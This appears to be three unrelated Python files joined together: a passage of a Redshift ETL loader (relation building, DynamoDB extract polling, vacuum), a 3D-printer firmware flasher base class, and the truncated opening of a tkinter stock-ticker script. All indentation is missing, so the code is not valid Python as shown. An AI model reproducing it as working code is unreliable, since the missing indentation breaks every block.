table within a transaction -- we've been having problems with locks, so the ANALYZE is skipped
for updates).
"""
try:
if relation.is_ctas_relation:
if relation.has_identity_column:
load_ctas_using_temp_table(conn, relation, dry_run=dry_run)
else:
load_ctas_directly(conn, relation, dry_run=dry_run)
else:
copy_data(conn, relation, dry_run=dry_run)
if not relation.in_transaction:
analyze(conn, relation, dry_run=dry_run)
except Exception as exc:
raise UpdateTableError(exc) from exc
def build_one_relation(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""
Empty out tables (either with delete or by create-or-replacing them) and fill 'em up.
Unless in delete mode, this always makes sure tables and views are created.
Within transaction? Only applies to tables which get emptied and then potentially filled again.
Not in transaction? Drop and create all relations and for tables also potentially fill 'em up
again.
"""
with relation.monitor() as monitor:
# Step 1 -- clear out existing data (by deletion or by re-creation)
if relation.in_transaction:
if not relation.is_view_relation:
delete_whole_table(conn, relation, dry_run=dry_run)
else:
create_or_replace_relation(conn, relation, dry_run=dry_run)
# Step 2 -- load data (and verify)
if relation.is_view_relation:
pass
elif relation.skip_copy:
logger.info(f"Skipping loading data into {relation:x} (skip copy is active)")
elif relation.failed:
logger.info(f"Bypassing already failed relation {relation:x}")
else:
update_table(conn, relation, dry_run=dry_run)
verify_constraints(conn, relation, dry_run=dry_run)
# Step 3 -- log size of table
if relation.is_view_relation or relation.failed or relation.skip_copy:
return
stmt = f"SELECT COUNT(*) AS rowcount FROM {relation}"
if dry_run:
etl.db.skip_query(conn, stmt)
return
rows = etl.db.query(conn, stmt)
if rows:
rowcount = rows[0]["rowcount"]
logger.info(f"Found {rowcount:d} row(s) in {relation:x}")
monitor.add_extra("rowcount", rowcount)
def build_one_relation_using_pool(pool, relation: LoadableRelation, dry_run=False) -> None:
conn = pool.getconn()
conn.set_session(autocommit=True, readonly=dry_run)
try:
build_one_relation(conn, relation, dry_run=dry_run)
except Exception as exc:
# Add (some) exception information close to when it happened
message = str(exc).split("\n", 1)[0]
if relation.is_required:
logger.error(
"Exception information for required relation {:x}: {}".format(relation, message)
)
else:
logger.error("Exception information for relation {:x}: {}".format(relation, message))
pool.putconn(conn, close=True)
raise
else:
pool.putconn(conn, close=False)
def vacuum(relations: Sequence[RelationDescription], dry_run=False) -> None:
"""
Tidy up the warehouse before guests come over.
This needs to open a new connection since it needs to happen outside a transaction.
"""
dsn_etl = etl.config.get_dw_config().dsn_etl
timer = Timer()
with closing(etl.db.connection(dsn_etl, autocommit=True, readonly=dry_run)) as conn:
for relation in relations:
etl.db.run(
conn,
"Running vacuum on {:x}".format(relation),
"VACUUM {}".format(relation),
dry_run=dry_run,
)
if not dry_run:
logger.info("Ran vacuum for %d table(s) (%s)", len(relations), timer)
# --- Section 4: Functions related to control flow
def create_source_tables_when_ready(
relations: Sequence[LoadableRelation],
max_concurrency=1,
look_back_minutes=15,
dry_run=False,
) -> None:
"""
Create source relations in several threads, as we observe their extracts to be done.
We assume here that the relations have no dependencies on each other and just gun it.
This will only raise an Exception if one of the created relations was marked as "required".
Since these relations may have downstream dependents, we make sure to mark skip_copy on
any relation from the full set of relations that depends on a source relation that failed
to load.
"""
idle_termination_seconds = etl.config.get_config_int(
"arthur_settings.concurrent_load_idle_termination_seconds"
)
source_relations = [relation for relation in relations if not relation.is_transformation]
if not source_relations:
logger.info("None of the relations are in source schemas")
return
dsn_etl = etl.config.get_dw_config().dsn_etl
pool = etl.db.connection_pool(max_concurrency, dsn_etl)
recent_cutoff = datetime.utcnow() - timedelta(minutes=look_back_minutes)
cutoff_epoch = timegm(recent_cutoff.utctimetuple())
sleep_time = 30
checkpoint_time_cutoff = sleep_time + idle_termination_seconds
timer = Timer()
for dispatcher in etl.monitor.MonitorPayload.dispatchers:
if isinstance(dispatcher, etl.monitor.DynamoDBStorage):
table = dispatcher.get_table() # Note, not thread-safe, so we can only have one poller
def poll_worker():
"""
Check DynamoDB for successful extracts.
Get items from the queue 'to_poll'.
When the item
- is an identifier: poll DynamoDB
- is an int: sleep that many seconds
"""
while True:
try:
item = to_poll.get(block=False)
except queue.Empty:
logger.info("Poller: Nothing left to poll")
return
if isinstance(item, int):
logger.debug("Poller: Reached end of relation list")
logger.debug(
"Poller: Checking that we have fewer than %s tasks left by %s",
checkpoint_queue_size_cutoff,
checkpoint_time_cutoff,
)
logger.debug(
"Poller: %s left to poll, %s ready to load, %s elapsed",
to_poll.qsize(),
to_load.qsize(),
timer.elapsed,
)
if (
checkpoint_queue_size_cutoff == to_poll.qsize()
and timer.elapsed > checkpoint_time_cutoff
):
raise ETLRuntimeError(
"No new extracts found in last %s seconds, bailing out"
% idle_termination_seconds
)
else:
if to_poll.qsize():
logger.debug("Poller: Sleeping for %s seconds", item)
time.sleep(item)
to_poll.put(item)
continue
res = table.query(
ConsistentRead=True,
KeyConditionExpression="#ts > :dt and target = :table",
FilterExpression="step = :step and event in (:fail_event, :finish_event)",
ExpressionAttributeNames={"#ts": "timestamp"},
ExpressionAttributeValues={
":dt": cutoff_epoch,
":table": item.identifier,
":step": "extract",
":fail_event": etl.monitor.STEP_FAIL,
":finish_event": etl.monitor.STEP_FINISH,
},
)
if res["Count"] == 0:
to_poll.put(item)
else:
for extract_payload in res["Items"]:
if extract_payload["event"] == etl.monitor.STEP_FINISH:
logger.info(
"Poller: Recently completed extract found for '%s', marking as ready.",
item.identifier,
)
elif extract_payload["event"] == etl.monitor.STEP_FAIL:
logger.info(
"Poller: Recently failed extract found for '%s', marking as failed.",
item.identifier,
)
# We are not inside an exception handler, so there is no exception info.
item.mark_failure(relations, exc_info=None)
# We'll create the relation on success and failure (but skip copy on failure)
to_load.put(item)
# There should be only one event, but definitely don't queue for loading twice.
break
uncaught_load_worker_exception = threading.Event()
def load_worker():
"""
Look for a ready-to-load relation from queue 'to_load'.
If the item
- is a relation: load it using connection pool 'pool'
- is None: we're giving up, so return
"""
while True:
item = to_load.get()
if item is None:
break
logger.info("Loader: Found %s ready to be loaded", item.identifier)
try:
build_one_relation_using_pool(pool, item, dry_run=dry_run)
except (RelationConstructionError, RelationDataError):
item.mark_failure(relations)
except Exception:
logger.error(
"Loader: Uncaught exception in load worker while loading '%s':",
item.identifier,
exc_info=True,
)
uncaught_load_worker_exception.set()
raise
to_poll = queue.Queue() # type: ignore
to_load = queue.Queue() # type: ignore
threads = []
for _ in range(max_concurrency):
t = threading.Thread(target=load_worker)
t.start()
threads.append(t)
for relation in source_relations:
logger.debug("Putting %s into poller queue", relation.identifier)
to_poll.put(relation)
to_poll.put(sleep_time) # Give DynamoDB a periodic break
# Track the queue size to detect progress
checkpoint_queue_size_cutoff = to_poll.qsize() - 1 # -1 because worker will have one task 'in hand'
poller = threading.Thread(target=poll_worker)
poller.start()
threads.append(poller)
logger.info("Poller started; %s left to poll, %s ready to load", to_poll.qsize(), to_load.qsize())
while poller.is_alive():
# Give the poller time to realize it's passed the idle checkpoint if it was sleeping
poller.join(idle_termination_seconds + sleep_time)
logger.info("Poller joined or checkpoint timeout reached")
# Update checkpoint for timer to have made an update
checkpoint_time_cutoff = timer.elapsed + idle_termination_seconds
logger.info(
"Current elapsed time: %s; cancel if no progress by %s", timer, checkpoint_time_cutoff
)
# Update last known queue size
checkpoint_queue_size_cutoff = to_poll.qsize()
logger.info("Current queue length: %s", checkpoint_queue_size_cutoff)
# When poller is done, send workers a 'stop' event and wait
for _ in range(max_concurrency):
to_load.put(None)
for t in threads:
t.join()
# If the poller queue wasn't emptied, it exited unhappily
if to_poll.qsize():
raise ETLRuntimeError("Extract poller exited while to-poll queue was not empty")
if uncaught_load_worker_exception.is_set():
raise ETLRuntimeError("Data source loader thread(s) exited with uncaught exception")
logger.info("Wrapping up work in %d worker(s): (%s)", max_concurrency, timer)
failed_and_required = [rel.identifier for rel in source_relations if rel.failed and rel.is_required]
if failed_and_required:
raise RequiredRelationLoadError(failed_and_required)
failed = [relation.identifier for relation in source_relations if relation.failed]
if failed:
logger.error(
"These %d relation(s) failed to build: %s", len(failed), join_with_single_quotes(failed)
)
logger.info("Finished with %d relation(s) in source schemas (%s)", len(source_relations), timer)
def create_source_tables_in_parallel(
relations: Sequence[LoadableRelation], max_concurrency=1, dry_run=False
) -> None:
"""
Create relations in parallel, using a connection pool, a thread pool, and a kiddie pool.
We assume here that the relations have no dependencies on each other and just gun it.
This will only raise an Exception if one of the created relations was marked as "required".
Since these relations may have downstream dependents, we make sure to mark skip_copy on
any relation from the full set of relations that depends on a source relation that failed
to load.
"""
source_relations = [relation for relation in relations if not relation.is_transformation]
if not source_relations:
logger.info("None of the relations are in source schemas")
return
timer = Timer()
dsn_etl = etl.config.get_dw_config().dsn_etl
pool = etl.db.connection_pool(max_concurrency, dsn_etl)
futures: Dict[str, concurrent.futures.Future] = {}
try:
with concurrent.futures.ThreadPoolExecutor(max_workers=max_concurrency) as executor:
for relation in source_relations:
future = executor.submit(build_one_relation_using_pool, pool, relation, dry_run=dry_run)
futures[relation.identifier] = future
# For fail-fast, switch to FIRST_EXCEPTION below.
done, not_done = concurrent.futures.wait(
futures.values(), return_when=concurrent.futures.ALL_COMPLETED
)
cancelled = [future for future in not_done if future.cancel()]
logger.info(
"Wrapping up work in %d worker(s): %d done, %d not done (%d cancelled) (%s)",
max_concurrency,
len(done),
len(not_done),
len(cancelled),
timer,
)
finally:
pool.closeall()
for relation in source_relations:
try:
futures[relation.identifier].result()
except concurrent.futures.CancelledError:
pass
except (RelationConstructionError, RelationDataError):
relation.mark_failure(relations)
failed_and_required = [rel.identifier for rel in source_relations if rel.failed and rel.is_required]
if failed_and_required:
raise RequiredRelationLoadError(failed_and_required)
failed = [relation.identifier for relation in source_relations if relation.failed]
if failed:
logger.error(
"These %d relation(s) failed to build: %s", len(failed), join_with_single_quotes(failed)
)
logger.info("Finished with %d relation(s) in source schemas (%s)", len(source_relations), timer)
def create_transformations_sequentially(
relations: Sequence[LoadableRelation], wlm_query_slots: int, statement_timeout: int, dry_run=False
) -> None:
"""
Create relations one-by-one.
If relations do depend on each other, we don't get ourselves in trouble here.
If we trip over a "required" relation, an exception is raised.
If dependencies were left empty, we'll fall back to skip_copy mode.
Given a dependency tree of:
A(required) <- B(required, per selector) <- C(not required) <- D (not required)
Then failing to create either A or B will stop us. But failure on C will just leave D empty.
N.B. It is not possible for a relation to be not required but have dependents that are
(by construction).
"""
transformations = [relation for relation in relations if relation.is_transformation]
if not transformations:
logger.info("None of the selected relations are in transformation schemas")
return
timer = Timer()
dsn_etl = etl.config.get_dw_config().dsn_etl
with closing(etl.db.connection(dsn_etl, autocommit=True, readonly=dry_run)) as conn:
etl.dialect.redshift.set_wlm_slots(conn, wlm_query_slots, dry_run=dry_run)
etl.dialect.redshift.set_statement_timeout(conn, statement_timeout, dry_run=dry_run)
for relation in transformations:
try:
build_one_relation(conn, relation, dry_run=dry_run)
except (RelationConstructionError, RelationDataError) as exc:
if relation.is_required:
raise RequiredRelationLoadError([relation.identifier]) from exc
relation.mark_failure(relations)
failed = [relation.identifier for relation in transformations if relation.failed]
if failed:
logger.error(
"These %d relation(s) failed to build: %s", len(failed), join_with_single_quotes(failed)
)
skipped = [
relation.identifier
for relation in transformations
if relation.skip_copy and not relation.is_view_relation
]
if 0 < len(skipped) < len(transformations):
logger.warning(
"These %d relation(s) were left empty: %s", len(skipped), join_with_single_quotes(skipped)
)
logger.info(
"Finished with %d relation(s) in transformation schemas (%s)", len(transformations), timer
)
def create_relations(
relations: Sequence[LoadableRelation],
max_concurrency=1,
wlm_query_slots=1,
statement_timeout=0,
concurrent_extract=False,
dry_run=False,
) -> None:
"""Build relations by creating them, granting access, and loading them (if they hold data)."""
if concurrent_extract:
create_source_tables_when_ready(relations, max_concurrency, dry_run=dry_run)
else:
create_source_tables_in_parallel(relations, max_concurrency, dry_run=dry_run)
create_transformations_sequentially(relations, wlm_query_slots, statement_timeout, dry_run=dry_run)
# --- Section 5: "Callbacks" (functions that implement commands)
# --- Section 5A: commands that modify tables and views
def load_data_warehouse(
all_relations: Sequence[RelationDescription],
selector: TableSelector,
use_staging=True,
publish_staging=True,
max_concurrency=1,
wlm_query_slots=1,
statement_timeout=0,
concurrent_extract=False,
skip_copy=False,
skip_loading_sources=False,
dry_run=False,
):
"""
Fully "load" the data warehouse after creating a blank slate.
By default, we use staging positions of schemas to load and thus wait with
moving existing schemas out of the way until the load is complete.
This function allows only complete schemas as selection.
1 Determine schemas that house any of the selected or dependent relations.
2 Move old schemas in the data warehouse out of the way (for "backup").
3 Create new schemas (and give access)
4 Loop over all relations in selected schemas:
4.1 Create relation (and give access)
4.2 Load data into tables or CTAS (no further action for views)
If it's a source table, use COPY to load data.
If it's a CTAS with an identity column, create temp table, then move data into final table.
If it's a CTAS without an identity column, insert values straight into final table.
On error: exit if use_staging, otherwise restore schemas from backup position
N.B. If arthur gets interrupted (e.g. because the instance is inadvertently shut down),
then there will be an incomplete state.
This is a callback of a command.
"""
selected_relations = etl.relation.select_in_execution_order(
all_relations, selector, include_dependents=True
)
if not selected_relations:
return
relations = LoadableRelation.from_descriptions(
selected_relations,
"load",
skip_copy=skip_copy,
skip_loading_sources=skip_loading_sources,
use_staging=use_staging,
)
traversed_schemas = find_traversed_schemas(relations)
logger.info(
"Starting to load %d relation(s) in %d schema(s)", len(relations), len(traversed_schemas)
)
dsn_etl = etl.config.get_dw_config().dsn_etl
with closing(etl.db.connection(dsn_etl, autocommit=True)) as conn:
tx_info = etl.data_warehouse.list_open_transactions(conn)
etl.db.print_result("List of sessions that have open transactions:", tx_info)
etl.data_warehouse.create_groups(dry_run=dry_run)
create_schemas_for_rebuild(traversed_schemas, use_staging=use_staging, dry_run=dry_run)
try:
create_relations(
relations,
max_concurrency,
wlm_query_slots,
statement_timeout,
concurrent_extract=concurrent_extract,
dry_run=dry_run,
)
except ETLRuntimeError:
if not use_staging:
logger.info("Restoring %d schema(s) after load failure", len(traversed_schemas))
etl.data_warehouse.restore_schemas(traversed_schemas, dry_run=dry_run)
raise
if use_staging and publish_staging:
logger.info("Publishing %d schema(s) after load success", len(traversed_schemas))
etl.data_warehouse.publish_schemas(traversed_schemas, dry_run=dry_run)
elif use_staging:
logger.info(
f"Updated {len(traversed_schemas)} staging schema(s) without updating loaded schemas"
)
def upgrade_data_warehouse(
all_relations: Sequence[RelationDescription],
selector: TableSelector,
max_concurrency=1,
wlm_query_slots=1,
statement_timeout=0,
only_selected=False,
include_immediate_views=False,
continue_from: Optional[str] = None,
use_staging=False,
target_schema: Optional[str] = None,
skip_copy=False,
dry_run=False,
) -> None:
"""
Push new (structural) changes and fresh data through data warehouse.
This will create schemas as needed to house the relations being created or replaced.
The set of relations is usually expanded to include all those (transitively) depending
on the selected ones. But this can be kept to just the selected ones for faster testing.
For all relations:
1 Drop relation
2 Create relation and grant access to the relation
3 Unless skip_copy is true (else leave tables empty):
3.1 Load data into tables
3.2 Verify constraints
Since views that directly hang off tables are deleted when their tables are deleted, the option
exists to include those immediate views in the upgrade.
If a target schema is provided, then the data is loaded into that schema instead of where the
relation would normally land. Note that a check prevents loading tables from different
execution levels in order to avoid loading tables that depend on each other. (In that case,
the query would have to be rewritten to use the relocated table.)
This is a callback of a command.
"""
selected_relations = etl.relation.select_in_execution_order(
all_relations,
selector,
include_dependents=not only_selected,
include_immediate_views=include_immediate_views,
continue_from=continue_from,
)
if not selected_relations:
return
involved_execution_levels = frozenset(
funcy.distinct(relation.execution_level for relation in selected_relations)
)
if target_schema and len(involved_execution_levels) != 1:
raise ETLRuntimeError(
f"relations might depend on each other while target schema is in effect "
f"(involved execution levels: {join_with_single_quotes(involved_execution_levels)})"
)
if only_selected and not include_immediate_views:
immediate_views = [
view.identifier for view in etl.relation.find_immediate_dependencies(all_relations, selector)
]
if immediate_views:
logger.warning(
"These views are not part of the upgrade: %s", join_with_single_quotes(immediate_views)
)
logger.info(
"Any views that depend in their query on tables that are part of the upgrade but"
" are not selected will be missing once the upgrade completes."
)
relations = LoadableRelation.from_descriptions(
selected_relations,
"upgrade",
skip_copy=skip_copy,
use_staging=use_staging,
target_schema=target_schema,
)
if target_schema:
logger.info("Starting to load %d relation(s) into schema '%s'", len(relations), target_schema)
else:
traversed_schemas = find_traversed_schemas(relations)
logger.info(
"Starting to upgrade %d relation(s) in %d schema(s)", len(relations), len(traversed_schemas)
)
etl.data_warehouse.create_schemas(traversed_schemas, use_staging=use_staging, dry_run=dry_run)
create_relations(relations, max_concurrency, wlm_query_slots, statement_timeout, dry_run=dry_run)
def update_data_warehouse(
all_relations: Sequence[RelationDescription],
selector: TableSelector,
wlm_query_slots=1,
statement_timeout=0,
start_time: Optional[datetime] = None,
only_selected=False,
run_vacuum=False,
dry_run=False,
):
"""
Let new data percolate through the data warehouse.
Within a transaction:
Iterate over relations (selected or (selected and transitively dependent)):
1 Delete rows
2 Load data from upstream sources using COPY command, load data into CTAS using views
for queries
3 Verify constraints
Note that a failure will rollback the transaction -- there is no distinction between required
or not-required.
Finally, if elected, run vacuum (in new connection) for all tables that were modified.
This is a callback of a command.
"""
selected_relations = etl.relation.select_in_execution_order(
all_relations, selector, include_dependents=not only_selected
)
tables = [relation for relation in selected_relations if not relation.is_view_relation]
if not tables:
logger.warning("Found no tables matching: %s", selector)
return
source_relations = [relation for relation in selected_relations if not relation.is_transformation]
if source_relations and start_time is not None:
logger.info(
"Verifying that all source relations have extracts after %s;"
" fails if incomplete and no update for 1 hour" % start_time
)
extracted_targets = etl.monitor.recently_extracted_targets(source_relations, start_time)
if len(source_relations) > len(extracted_targets):
raise MissingExtractEventError(source_relations, extracted_targets)
elif source_relations:
logger.info(
"Attempting to use existing manifests for source relations without verifying recency."
)
relations = LoadableRelation.from_descriptions(selected_relations, "update", in_transaction=True)
logger.info("Starting to update %d tables(s) within a transaction", len(relations))
dsn_etl = etl.config.get_dw_config().dsn_etl
with closing(etl.db.connection(dsn_etl, readonly=dry_run)) as tx_conn, tx_conn as conn:
etl.dialect.redshift.set_wlm_slots(conn, wlm_query_slots, dry_run=dry_run)
etl.dialect.redshift.set_statement_timeout(conn, statement_timeout, dry_run=dry_run)
for relation in relations:
build_one_relation(conn, relation, dry_run=dry_run)
if run_vacuum:
vacuum(tables, dry_run=dry_run)
# --- Section 5B: commands that provide information about relations
def run_query(relation: RelationDescription, limit=None, use_staging=False) -> None:
"""
Run the query for the relation (which must be a transformation, not a source).
This is a callback of a command.
"""
dsn_etl = etl.config.get_dw_config().dsn_etl
loadable_relation = LoadableRelation(relation, {}, use_staging)
timer = Timer()
# We cannot use psycopg2's '%s' with LIMIT since the query may contain
# arbitrary text, including "LIKE '%something%'", which would break mogrify.
limit_clause = "LIMIT NULL" if limit is None else f"LIMIT {limit:d}"
query_stmt = loadable_relation.query_stmt + f"\n{limit_clause}\n"
with closing(etl.db.connection(dsn_etl)) as conn:
logger.info(
"Running query underlying '%s' (with '%s')",
relation.identifier,
limit_clause,
)
results = etl.db.query(conn, query_stmt)
logger.info(
"Ran query underlying '%s' and received %d row(s) (%s)", relation.identifier, len(results), timer
)
# TODO(tom): This should grab the column names from the query to help with debugging.
if relation.has_identity_column:
columns = relation.unquoted_columns[1:]
else:
columns = relation.unquoted_columns
print(format_lines(results, header_row=columns))
def check_constraints(relations: Sequence[RelationDescription], use_staging=False) -> None:
"""
Check the table constraints of selected relations.
This is a callback of a command.
"""
dsn_etl = etl.config.get_dw_config().dsn_etl
loadable_relations = [LoadableRelation(relation, {}, use_staging) for relation in relations]
timer = Timer()
with closing(etl.db.connection(dsn_etl)) as conn:
for relation in loadable_relations:
logger.info("Checking table constraints of '%s'", relation.identifier)
verify_constraints(conn, relation)
logger.info("Checked table constraints of %d relation(s) (%s)", len(loadable_relations), timer)
def show_downstream_dependents(
relations: Sequence[RelationDescription],
selector: TableSelector,
continue_from: Optional[str] = None,
with_dependencies: Optional[bool] = False,
with_dependents: Optional[bool] = False,
) -> None:
"""
List the execution order of loads or updates.
Relations are marked based on whether they were directly selected or selected as
part of the propagation of new data.
They are also marked whether they'd lead to a fatal error since they're required for full load.
This is a callback of a command.
"""
# Relations are directly selected by pattern or by being somewhere downstream of a selected one.
selected_relations = etl.relation.select_in_execution_order(
relations, selector, include_dependents=True, continue_from=continue_from
)
if not selected_relations:
return
directly_selected_relations = etl.relation.find_matches(selected_relations, selector)
selected = frozenset(relation.identifier for relation in directly_selected_relations)
immediate_views = etl.relation.find_immediate_dependencies(selected_relations, selector)
immediate = frozenset(relation.identifier for relation in immediate_views)
logger.info(
"Execution order includes %d selected, %d immediate, and %d other downstream relation(s)",
len(selected),
len(immediate),
len(selected_relations) - len(selected) - len(immediate),
)
flag = {}
for relation in selected_relations:
if relation.identifier in selected:
flag[relation.identifier] = "selected"
elif relation.identifier in immediate:
flag[relation.identifier] = "immediate"
else:
flag[relation.identifier] = "dependent"
dependents = defaultdict(list)
for relation in relations:
for dependency in relation.dependencies:
dependents[dependency.identifier].append(relation.identifier)
# See computation of execution order -- anything depending on pg_catalog must come last.
pg_catalog_dependency = {
dependency.identifier
for relation in selected_relations
for dependency in relation.dependencies
if dependency.schema == "pg_catalog"
}
current_index = {relation.identifier: i + 1 for i, relation in enumerate(selected_relations)}
# Note that external tables are not in the list of relations (always level = 0),
# and if a relation isn't part of the downstream set, it's considered built already (level = 0).
current_level: Dict[str, int] = defaultdict(int)
# Now set the level that we show so that it starts at 1 for the relations we're building here.
# Pass 1: find out the largest level, ignoring pg_catalog dependencies.
for relation in selected_relations:
current_level[relation.identifier] = 1 + max(
(current_level[dependency.identifier] for dependency in relation.dependencies), default=0
)
# Pass 2: update levels assuming pg_catalog is built at that largest level so far.
pg_catalog_level = max(current_level.values())
for identifier in pg_catalog_dependency:
current_level[identifier] = pg_catalog_level
for relation in selected_relations:
current_level[relation.identifier] = 1 + max(
(current_level[dependency.identifier] for dependency in relation.dependencies), default=0
)
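# Tiny illustration of the two passes above (hypothetical identifiers): with A <- B <- C and a
# relation D that depends only on a pg_catalog table, pass 1 yields levels A=1, B=2, C=3, D=1;
# pass 2 pins the pg_catalog dependency at the largest level seen (3), so D is recomputed as
# level 4, reflecting that anything depending on pg_catalog comes last.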
width_selected = max(len(identifier) for identifier in current_index)
width_dep = max(len(identifier) for identifier in current_level)
line_template = (
"{relation.identifier:{width}s}"
" # {relation.source_type} index={index:4d} level={level:3d}"
" flag={flag:9s}"
" is_required={relation.is_required}"
)
dependency_template = " #<- {identifier:{width}s} level={level:3d}"
dependent_template = " #-> {identifier:{width}s} index={index:4d} level={level:3d}"
for relation in selected_relations:
print(
line_template.format(
flag=flag[relation.identifier],
index=current_index[relation.identifier],
level=current_level[relation.identifier],
relation=relation,
width=width_selected,
)
)
if with_dependencies:
for dependency in sorted(relation.dependencies):
print(
dependency_template.format(
identifier=dependency.identifier,
level=current_level[dependency.identifier],
width=width_dep,
)
)
if with_dependents:
for dependent in sorted(dependents[relation.identifier], key=lambda x: current_index[x]):
print(
dependent_template.format(
identifier=dependent,
index=current_index[dependent],
level=current_level[dependent],
width=width_dep,
)
)
def show_upstream_dependencies(relations: Sequence[RelationDescription], selector: TableSelector):
"""
List the relations upstream (towards sources) from the selected ones in execution order.
This is a callback of a command.
"""
execution_order = etl.relation.order_by_dependencies(relations)
selected_relations = etl.relation.find_matches(execution_order, selector)
if len(selected_relations) == 0:
logger.warning("Found no matching relations for: %s", selector)
return
dependencies = {relation.identifier for relation in selected_relations}
for relation in execution_order[::-1]:
if relation.identifier in dependencies:
dependencies.update(dep.identifier for dep in relation.dependencies)
max_len = max(len(identifier) for identifier in dependencies)
line_template = (
"{relation.identifier:{width}s} # {relation.source_type} index={index:4d}"
" is_required={relation.is_required}"
)
for i, relation in enumerate(execution_order):
if relation.identifier in dependencies:
print(line_template.format(index=i + 1, relation=relation, width=max_len))
|
base_flasher.py
|
from .flasher_error import FlasherError
import time
import flask
import requests
import tempfile
import os
import re
from threading import Thread
class BaseFlasher:
def __init__(self, settings, printer, plugin, plugin_manager, identifier, logger):
self._settings = settings
self._printer = printer
self._plugin = plugin
self._plugin_manager = plugin_manager
self._identifier = identifier
self._logger = logger
self._firmware = None
self._firmware_version = None
self._firmware_author = None
self._firmware_upload_time = None
self._should_run_post_script = False
self._flash_status = None
def _background_run(self, target, args=None):
# default to an empty tuple so the thread target can be called when no args are given
thread = Thread(target=target, args=args if args is not None else ())
thread.start()
return thread
def _run_pre_flash_script(self):
pre_flash_script = self._settings.get_pre_flash_script()
if pre_flash_script:
self._logger.debug("Running pre-flash GCode script :")
self._logger.debug(pre_flash_script)
commands = [line.strip() for line in pre_flash_script.splitlines()]
self._printer.commands(commands)
else:
self._logger.debug("No pre-flash GCode script defined")
def _wait_pre_flash_delay(self):
self._logger.debug("Waiting pre-flash delay...")
time.sleep(self._settings.get_pre_flash_delay())
def _run_post_flash_script(self):
post_flash_script = self._settings.get_post_flash_script()
if post_flash_script:
self._logger.debug("Running post-flash script")
self._logger.debug(post_flash_script)
commands = [line.strip() for line in post_flash_script.splitlines()]
self._printer.commands(commands)
else:
self._logger.debug("No script defined")
def _wait_post_flash_delay(self):
self._logger.debug("Waiting post-flash delay...")
time.sleep(self._settings.get_post_flash_delay())
def _validate_firmware_file(self, file_path):
raise FlasherError("Unsupported function call.")
def handle_connected_event(self):
if self._should_run_post_script:
self._run_post_flash_script()
self._should_run_post_script = False
def check_setup_errors(self):
raise FlasherError("Unsupported function call.")
def upload(self):
self._logger.debug("Firmware uploaded by the user")
uploaded_file_path = flask.request.values["firmware_file." + self._settings.get_upload_path_suffix()]
errors = self._validate_firmware_file(uploaded_file_path)
if errors:
self._push_firmware_info()
return None, errors
result = self._handle_firmware_file(uploaded_file_path)
self._push_firmware_info()
return result
def download(self):
self._logger.debug("Downloading firmware...")
r = requests.get(flask.request.values["url"])
self._logger.debug("Saving downloaded firmware...")
with tempfile.NamedTemporaryFile(delete=False) as temp:
temp.write(r.content)
temp_path = temp.name
errors = self._validate_firmware_file(temp_path)
if errors:
self._push_firmware_info()
os.remove(temp_path)
return None, errors
result = self._handle_firmware_file(temp_path)
self._push_firmware_info()
self._logger.debug("Clearing downloaded firmware...")
os.remove(temp_path)
return result
def _handle_firmware_file(self, firmware_file_path):
raise FlasherError("Unsupported function call.")
def _find_firmware_info(self):
for root, dirs, files in os.walk(self._firmware):
for f in files:
if f == "Version.h":
self._logger.debug("Found Version.h, opening it...")
with open(os.path.join(root, f), "r") as version_file:
for line in version_file:
version = re.findall(r'#define +SHORT_BUILD_VERSION +"([^"]*)"', line)
if version:
self._firmware_version = version[0]
self._logger.debug("Found SHORT_BUILD_VERSION : %s" % self._firmware_version)
break
elif f == "Configuration.h":
self._logger.debug("Found Configuration.h, opening it...")
with open(os.path.join(root, f), "r") as configfile:
for line in configfile:
author = re.findall(r'#define +STRING_CONFIG_H_AUTHOR +"([^"]*)"', line)
if author:
self._firmware_author = author[0]
self._logger.debug("Found STRING_CONFIG_H_AUTHOR : %s" % self._firmware_author)
break
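# The regular expressions above are expected to match Marlin-style firmware headers, e.g.
# (hypothetical values):
#   #define SHORT_BUILD_VERSION "2.0.x"
#   #define STRING_CONFIG_H_AUTHOR "(anonymous, default config)"
# Only the quoted value is captured into _firmware_version / _firmware_author.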
def _firmware_info_event_name(self):
raise FlasherError("Undefined function call")
def _push_firmware_info(self):
self._logger.debug("Sending firmware info through websocket")
self._plugin_manager.send_plugin_message(self._identifier, dict(
type=self._firmware_info_event_name(),
version=self._firmware_version,
author=self._firmware_author,
upload_time=self._firmware_upload_time.strftime("%d/%m/%Y, %H:%M:%S") if self._firmware_upload_time is not None else None,
firmware=self._firmware
))
def _push_flash_status(self, event_name):
if self._flash_status:
data = dict(
type=event_name
)
data.update(self._flash_status)
self._plugin_manager.send_plugin_message(self._identifier, data)
def send_initial_state(self):
self._push_firmware_info()
|
stockwatcher.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
########################################################################
# Name:
# stockwatcher.py
# Description:
# GUI tool that displays stocks in a floating window.
# Author:
# wesley wu
# Python:
# 3.5+
# Version:
# 1.0
########################################################################
# by Dxw 20200805
# Forked from: https://github.com/weswu8/stockwatcher
# v1.1
# 1. Reconnect after network disconnect
# 2. Remove the bin from the git repo
# 3. Remove & sw-small.ico
# 4. Automatically hide the interface during non-trading period
########################################################################
from tkinter import *
from tkinter.font import Font
from PIL import Image, ImageTk
from urllib.request import urlopen
import json, time, threading, datetime, base64, io
# ==================define the global variables ========================
# the url of remote stock service
mRemoteStockUrl = 'http://hq.sinajs.cn/list='
mRemoteStockImgUrl = 'http://image.sinajs.cn/newchart/min/n/{}.gif'
# the configuration file for the tools
mConfFile = 'stockwatcher.conf'
# the key name in the configuration file
mConfSection = 'stocks'
# the click event flag
mOnMouseEnter = False
# the width of the windows
mWinWidth = 400
mMainWinHeight = 25
mMainWinBottomLeftShift = 10
mMainWinBottomUpShift = 40
mPopWinWidth = 545
mPopWinLeftShift = 150
mPopWinUpShift = 340
mPopWinHeight = 300
# define the tags
mUpTag = 'UP'
mEvenTag = 'EVEN'
mDownTag = 'DOWN'
# define the char
mCharUp = '\u25B2'
mCharDown = '\u25BC'
mCharEven = '\u268C'
mCharWin = '\u2600'
mCharLose = '\u2614'
mCharDraw = '\u268C'
mCharWinAlert = '\u2615'
mCharLoseAlert = '\u2702'
# ms time for the speed of text scroll
mCharRefreshSpeed = 5000
# the multiplier with the size of the msg
mRefreshMultiplier = 1
# the stock info refresh interval by seconds
mUpdateInterval = 10
#mWinIcon = "sw-small.ico"
mWinTitle = "Stock Watcher"
mDetailedWinTitle = "Detailed Info"
mIsMarketClosed = False
# the main class for the function
class StocksInfoFetcher(object):
"""
Class of GetStocksInfo
"""
_instance = None
    # overwrite the __new__ method to create a singleton
def __new__(cls, *args, **kwargs):
if not cls._instance:
